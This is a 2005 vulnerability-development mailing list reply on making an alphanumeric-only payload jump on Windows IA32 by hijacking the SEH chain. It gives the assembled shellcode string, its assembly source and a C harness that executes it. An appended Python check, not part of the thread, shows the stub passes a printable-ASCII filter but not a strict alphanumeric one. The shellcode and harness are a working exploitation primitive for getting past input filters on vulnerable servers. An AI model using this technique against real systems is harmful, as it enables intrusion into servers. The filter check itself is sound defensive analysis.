Vulnerability Development mailing list archives

Re: AlphaNumeric Exploitation Help


From: Costin Ionescu <costin.ionescu () gmail com>
Date: Fri, 27 May 2005 09:52:36 +0100

On 26 May 2005 11:38:25 -0000, ramatkal () hotmail com
<ramatkal () hotmail com> wrote:

> I am trying to exploit a vulnerable server which only allows
> alphanumeric characters....
>
> I have successfully taken control of EIP and now need to do a JUMP -600
> bytes.....
>
> The problem is that 'eb' and 'e9' are not alphanumeric ASCII codes and
> thus cannot be used to do the jumps in the payload....
>
> Anyone got any ideas/tricks/advice on how I can accomplish a JMP -600
> bytes, or any type of jump for that matter, only using alphanumeric chars?

I assume you're exploiting an IA32 machine running Windows. I also
assume that you know the address where you want to jump to - let's say
you have it in ECX.

Here's the code assembled: %!!!!%@@@@P_d38d18QWd1 l
And the source:
and eax, 21212121h
and eax, 40404040h ; eax = 0
push eax
pop edi ; edi = 0
xor edi, [fs:eax] ; edi = last SEH frame
xor [fs:eax], edi ; fs:[0] = 0
push ecx ; where you want to jump to
push edi ; previous SEH frame
xor [fs:eax], esp ; set the new SEH frame
insb ; crash to run your SEH

Here's also a small C code to test this:
#include <stdio.h>
#include <stdlib.h>   /* exit() */

/* The stub is entered as a __fastcall function, so the jump target
   (kaboom) arrives in ECX, exactly as the listing above assumes. */
typedef void (__fastcall *FN)(void *addr);

void kaboom(void) { printf("kaboom\n"); exit(0); }

/* Assembled bytes of the listing above; the space after "d1" is the
   0x20 ModRM byte of "xor [fs:eax], esp". Executing a string literal
   assumes the page holding it is executable (i.e. no DEP). */
char *shell = "%!!!!%@@@@P_d38d18QWd1 l";

int main(void)
{
    FN f = (FN) shell;
    f(&kaboom);   /* insb raises an exception; the SEH handler just installed is kaboom */
    return 0;
}

Now, if you don't know the address where you want to jump to, you must
instead know the address of your code to compute the jump target. If
you don't know that either, you generate your code on the stack (using
nice alphanumeric opcodes), use the method above to pass control to it
(setting ECX to ESP beforehand). You can generate the code on the stack to
use the full instruction set, so from there it gets really boring ;-)

Cheers,

Costin
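As an added check, not part of the thread, this is the allowlist filter a defender would run over the posted payload: it classifies every byte against a strict [A-Za-z0-9] set and against printable ASCII, and reports the offsets a filter would reject. Run on the string from the post (constructed here as bytes), it shows the stub passes only the printable-ASCII filter: `%`, `!`, `@`, `_` and the 0x20 ModRM byte of `xor [fs:eax], esp` all fall outside the alphanumeric set.

```python
import string

# The payload from the post above, constructed here as bytes; the space
# after "d1" is part of the payload (ModRM byte of "xor [fs:eax], esp").
POSTED_PAYLOAD = b"%!!!!%@@@@P_d38d18QWd1 l"

ALNUM = set(string.ascii_letters.encode() + string.digits.encode())
PRINTABLE = set(range(0x20, 0x7F))  # printable 7-bit ASCII, space included


def classify_bytes(payload: bytes) -> dict:
    """Report which bytes of payload an allowlist filter would reject.

    Returns the offsets outside [A-Za-z0-9], the offsets outside printable
    ASCII, and whether the payload passes each filter. Offsets index the
    original payload so a reviewer can map a rejected byte back to the
    instruction that produced it.
    """
    not_alnum = [i for i, b in enumerate(payload) if b not in ALNUM]
    not_printable = [i for i, b in enumerate(payload) if b not in PRINTABLE]
    return {
        "length": len(payload),
        "not_alnum": not_alnum,
        "not_printable": not_printable,
        "passes_alnum_filter": not not_alnum,
        "passes_printable_filter": not not_printable,
    }


def offending_bytes(payload: bytes, offsets: list) -> str:
    """Render rejected bytes as 'offset:0xNN' pairs for a human reader."""
    return ", ".join(f"{i}:0x{payload[i]:02x}" for i in offsets)


if __name__ == "__main__":
    report = classify_bytes(POSTED_PAYLOAD)
    print(report)
    print("rejected by [A-Za-z0-9] filter:",
          offending_bytes(POSTED_PAYLOAD, report["not_alnum"]))
```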
